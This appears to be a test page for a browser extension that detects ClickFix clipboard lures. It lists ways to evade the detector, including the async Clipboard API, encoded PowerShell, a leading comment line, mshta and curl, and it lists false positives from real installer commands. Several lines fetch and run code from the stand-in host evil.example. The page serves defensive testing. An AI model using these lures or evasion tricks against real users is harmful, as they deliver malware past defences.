Load this file with the HEAT Shield extension installed and active. Each test below either bypasses the detector
(a malicious-looking string lands on the clipboard untouched) or causes a destructive false positive (the legitimate
page is redirected to blocked.html).
After running a bypass, paste into this textarea (Ctrl/⌘+V) or click “Read clipboard”. If the malicious string is present, the detector was bypassed.
navigator.clipboard.writeText() primary bypassThe detector listens only for synchronous copy/cut DOM events
and reads document.getSelection(). The async Clipboard API fires neither and
requires no selection. This is the dominant ClickFix pattern in the wild.
navigator.clipboard.writeText('powershell -nop -c "iex(iwr https://evil.example/x.ps1)"')
stopImmediatePropagation on copy bypassThe detector attaches with default (bubble) options on window. A page-attached
listener that runs first can cancel propagation before the detector ever sees the event.
-EncodedCommand hides the URL bypassRegex #1 requires a literal http(s):// in the clipboard text. A base64-encoded
PowerShell command contains no literal URL, so the URL lookahead fails and the regex doesn’t match.
mshta bypassRegex #1 is anchored to powershell/powershell.exe.
mshta, cmd /c curl, rundll32,
regsvr32, wscript/cscript,
and pwsh are all uncovered.
mshta https://evil.example/payload.hta
cmd /c curl bypasscmd /c "curl -o %TEMP%\\a.exe https://evil.example/p.exe && %TEMP%\\a.exe"
irm without iex bypassThe regex matches iex/iwr but not irm.
This payload uses irm + -OutFile + ampersand-invoke and never says iex.
powershell -nop -c "irm https://evil.example/p.ps1 -OutFile $env:TEMP\\p.ps1; & \"$env:TEMP\\p.ps1\""
^\s*powershell bypassAny character that isn’t whitespace before powershell kills the anchor.
Real ClickFix lures often include a leading comment line.
# Verify CAPTCHA — paste into Win+R powershell -nop -c "iex(iwr https://evil.example/x.ps1)"
about:blank child frame bypassManifest sets match_about_blank: false. A same-origin about:blank
child frame has no detector and can populate the parent’s clipboard via the Clipboard API.
Each button below uses a hidden textarea + execCommand('copy') with the listed,
real-world install command. The regex matches, the detector calls preventDefault(),
sends a threat-detected message, and the background worker redirects this tab to
blocked.html. That redirect is the false positive.
powershell -NoProfile -ExecutionPolicy Bypass -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1'))"
powershell -Command "Set-ExecutionPolicy Bypass -Scope Process -Force; iex ((New-Object System.Net.WebClient).DownloadString('https://ohmyposh.dev/install.ps1'))"
powershell -Command "Invoke-WebRequest -Uri https://learn.microsoft.com/sample.ps1 -OutFile sample.ps1"
powershell -Command "iwr -Uri https://example.com/file.zip -OutFile C:\\Temp\\file.zip"
|) empty alternative FPThe flag list ends with |), an empty alternative. Combined with \b this
lets any -Word token satisfy the lookahead. So benign help text matches:
powershell -Help https://learn.microsoft.com/powershell
If the detector is loaded and working, this should redirect the tab. Use it to confirm the extension is active before interpreting the bypasses above.
powershell -nop -c "iex(iwr https://evil.example/x.ps1)"
copy/cut on window (bubble phase).document.getSelection().toString().setData('text/plain','') + preventDefault() and dispatches onanalyse.threat-detected and navigates the tab to blocked.html.